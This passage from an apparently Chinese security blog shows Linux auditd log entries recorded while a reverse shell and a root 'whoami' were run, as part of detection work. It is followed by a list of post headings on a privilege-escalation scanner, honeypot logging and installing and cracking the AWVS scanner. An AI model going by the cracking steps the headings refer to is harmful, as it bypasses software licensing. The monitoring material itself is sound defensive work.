type=PROCTITLE msg=audit(1500976257.753:113): proctitle="/usr/lib/gnome-terminal/gnome-terminal-server"

执行反弹命令直接监控到日志如上。输入whoami，也可监控到回显：

type=SYSCALL msg=audit(1500976407.153:125): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:125): proctitle="whoami"
type=SYSCALL msg=audit(1500976407.153:126): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:126): proctitle="whoami"

待续…

pirogue

越权扫描器碎碎念

碎碎念

为什么要做这个东西？

产品设计

代理

MitmProxy

Openresty

Goproxy

越权扫描器

详细思路

bacLogic.go

cookie.go

risk.go

“替换的cookie”来自哪里？crontab.go

扫描器后台

为什么要提到“技术门槛”？

核心功能是否直观？

Demo展示

抛砖引玉

币圈量化交易试水

说明

步骤

注册Tradingview

打开脚本页面

点击图表按钮

选择btcusdt的图表布局

选择收藏的脚本应用到图表上

添加信号告警

币圈友情提示

被动扫描器研发（1）：golang生成cdata xml格式数据

背景

原burpsuite xml导出数据格式

cdata xml with golang of export burpsuite

awvs（12.0.190515149）linux 安装和破解

升级Ubuntu操作系统

安装软件依赖

从官网下载最新的awvs linux版本

安装awvs

awvs修改端口

破解awvs

保护license不失效

awvs破解后14天失效问题解决

opencanary二次开发(1)-日志格式

关键代码

日志格式xmind

监听端口

应用日志

HTTP

触发方式

日志格式

FTP

触发方式

日志格式

SSH

触发方式

日志格式

Telnet

触发方式

日志格式

MYSQL

触发方式

日志格式

git协议

触发方式

日志格式

NTP协议

触发方式

日志格式

redis

触发方式

日志格式

TCP Banner

触发方式

日志格式

VNC

触发方式

日志格式

RDP

触发方式